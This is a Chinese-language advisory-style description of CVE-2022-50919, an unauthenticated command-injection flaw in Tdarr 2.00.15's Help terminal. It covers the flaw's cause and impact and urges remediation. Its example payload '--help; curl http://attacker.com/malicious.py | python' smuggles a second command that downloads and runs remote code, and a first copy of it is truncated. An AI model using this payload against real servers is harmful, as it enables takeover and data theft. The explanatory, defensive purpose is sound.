CVE-2022-50919CVE-2022-50919是Tdarr媒体自动化处理软件中存在的一个严重安全漏洞,CVSS评分高达9.8分,属于紧急级别安全事件。该漏洞存在于Tdarr 2.00.15版本的Help终端模块中,允许未经身份验证的远程攻击者通过注入恶意命令实现对目标系统的完全控制。Tdarr是一款流行的开源媒体自动化工具,主要用于视频转码、格式转换和媒体库管理,被广泛应用于个人媒体服务器、NAS设备以及小型企业的媒体处理环境中。由于该漏洞利用门槛极低,攻击者无需任何凭证即可发起攻击,且漏洞存在于软件的Help功能模块中,攻击者可以通过构造特定的命令注入载荷(如--help; curl .py | python)来执行任意系统命令。成功利用此漏洞后,攻击者可以完全控制目标服务器,窃取敏感数据、安装后门程序、部署挖矿木马或进一步横向移动攻击内网中的其他系统。该漏洞的威胁程度极高,建议所有使用受影响版本Tdarr的用户立即采取修复措施。
该漏洞的根本原因在于Tdarr的Help终端模块缺乏输入过滤和权限验证机制。在Tdarr的Help功能实现中,系统直接接收用户输入而未进行安全过滤,当攻击者构造包含特殊字符的恶意输入时,可以成功注入并执行任意系统命令。具体来说,攻击者利用命令分隔符(如分号)将Help命令与恶意命令链接,例如使用--help; curl http://attacker.com/malicious.py | python这样的载荷。系统会先执行Help功能,然后继续执行后续注入的命令。由于Tdarr默认以较高权限运行(通常以root或sudo权限),攻击者注入的命令将以同等权限执行,从而获得对整个系统的完全控制权。攻击者可以利用curl、wget等工具下载并执行恶意脚本,建立反向shell连接,或直接执行系统管理命令。该漏洞的利用不需要任何身份验证,攻击者只需能够访问Tdarr的Web界面或API端口即可发起攻击。